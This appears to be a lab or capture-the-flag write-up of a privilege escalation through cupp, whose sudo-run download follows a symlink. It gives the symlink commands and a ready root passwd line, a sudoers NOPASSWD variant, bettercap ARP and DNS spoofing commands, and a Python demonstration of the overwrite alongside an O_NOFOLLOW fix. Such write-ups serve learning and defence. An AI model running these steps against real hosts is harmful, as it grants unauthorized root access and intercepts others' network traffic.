After running sudo /usr/bin/cupp -l, the script downloads files from a fixed URL (http://ftp.funet.fi/…). The downloads are saved under the current working directory, in a dictionaries/ subdirectory structure that it creates.

Choosing 1 (Moby) makes it create and write the file ./dictionaries/Moby/mhyph.tar.gz.

No check is made on that path at all, so if it is a symbolic link the download is written through the link as root: we can overwrite any file we like.

image-20251210202338178

Create the link.

We can add a privileged user to /etc/passwd:

image-20251210201658538

dgh:$1$hacked$mHLOr0u7iVhNIsYN5tMM.0:0:0:root:/root:/bin/bash

image-20251210202227287
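The following Python demonstration, added here and taken neither from cupp nor from the author, plays the symlink overwrite out in a temporary directory with a constructed stand-in for /etc/passwd: unsafe_save() writes the way a naive download does, through open(), which follows symlinks, and safe_save() shows the O_EXCL|O_NOFOLLOW check that makes the kernel refuse to write through a link. It also covers the caveat a practitioner wants here: the download replaces the whole target file, so the file served from the fake ftp.funet.fi must be a complete copy of the current /etc/passwd (already read through the database above) plus the new line, not the dgh line alone.

```python
#!/usr/bin/env python3
"""Symlink overwrite via a root-run download, and the hardened write (added example)."""
import os
import tempfile

# The line from the writeup: uid 0 / gid 0, so it is a second root account.
ROOT_LINE = "dgh:$1$hacked$mHLOr0u7iVhNIsYN5tMM.0:0:0:root:/root:/bin/bash\n"


def unsafe_save(dest, data):
    """Download-style write: create parent dirs, then open(..., 'wb'), which
    follows a symlink at dest and truncates whatever it points to."""
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as f:
        f.write(data)


def safe_save(dest, data):
    """Hardened write: O_EXCL|O_NOFOLLOW makes the kernel fail on a symlink
    (and on any pre-existing file) instead of writing through it."""
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(data)


def build_served_file(current_passwd, extra_line):
    """The download replaces the whole file, so the served content must be the
    complete current /etc/passwd plus the new line, or every other account is lost."""
    if not current_passwd.endswith("\n"):
        current_passwd += "\n"
    return (current_passwd + extra_line).encode()


def demo():
    """Run the attack against a throwaway copy; returns (file after, hardened write blocked)."""
    with tempfile.TemporaryDirectory() as work:
        victim = os.path.join(work, "etc_passwd")          # stand-in for /etc/passwd
        original = ("root:x:0:0:root:/root:/bin/bash\n"
                    "todd:x:1000:1000:,,,:/home/todd:/bin/bash\n")
        with open(victim, "w") as f:
            f.write(original)

        # What the attacker does as todd before running `sudo /usr/bin/cupp -l`.
        link = os.path.join(work, "dictionaries", "Moby", "mhyph.tar.gz")
        os.makedirs(os.path.dirname(link))
        os.symlink(victim, link)

        # What root's cupp does once ftp.funet.fi resolves to the attacker.
        unsafe_save(link, build_served_file(original, ROOT_LINE))
        with open(victim) as f:
            after = f.read()

        # The hardened version refuses the same write.
        try:
            safe_save(link, b"anything")
            blocked = False
        except OSError:          # EEXIST or ELOOP, depending on which check fires
            blocked = True
        return after, blocked


if __name__ == "__main__":
    after, blocked = demo()
    print(after)
    print("hardened write blocked:", blocked)
```

On a real target the same holds for the sudoers variant below: whatever is served is written verbatim, so serve exactly the file you want to end up at the link's destination.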

Next, use bettercap to fool the target into resolving ftp.funet.fi to my Kali machine:

# 1. Enable network discovery (gets traffic flowing)
net.probe on

# 2. ARP spoofing (intercept the target's traffic)
set arp.spoof.targets 192.168.56.111
arp.spoof on

# 3. DNS spoofing (the actual hijack)
# Note: the option is dns.spoof.domains; do not type dns.spoof.hosts by mistake
set dns.spoof.domains ftp.funet.fi
set dns.spoof.address 192.168.56.112
dns.spoof on

Run sudo /usr/bin/cupp -l on the target again and choose 1, and the privileged user is written into /etc/passwd. Before re-running it, confirm from the target that ftp.funet.fi now resolves to the Kali address (for example with getent hosts ftp.funet.fi), and make sure Kali serves the file at the same path cupp requests.

Another option: on Kali,

echo "todd ALL=(ALL) NOPASSWD: ALL" > pub/unix/security/passwd/crack/dictionaries/dictionaries/mhyph.tar.gz

and point the link at /etc/sudoers.d/todd instead:

ln -sf /etc/sudoers.d/todd dictionaries/dictionaries/mhyph.tar.gz

This gives todd the right to run any command with sudo.

But my hijacking attempt failed, for the following reason:

VMware and VirtualBox are completely isolated from each other at Layer 2.

Although both sides are configured with 192.168.56.x addresses and may be able to ping each other at the network layer (Layer 3, routed through the host), at the link layer (Layer 2) bettercap cannot deliver ARP packets to the target at all, because the two VMs sit on two entirely different virtual switches.

Either migrate both Kali and the target to VirtualBox, or put both into bridged mode,

image-20251210210903307

and enable promiscuous mode.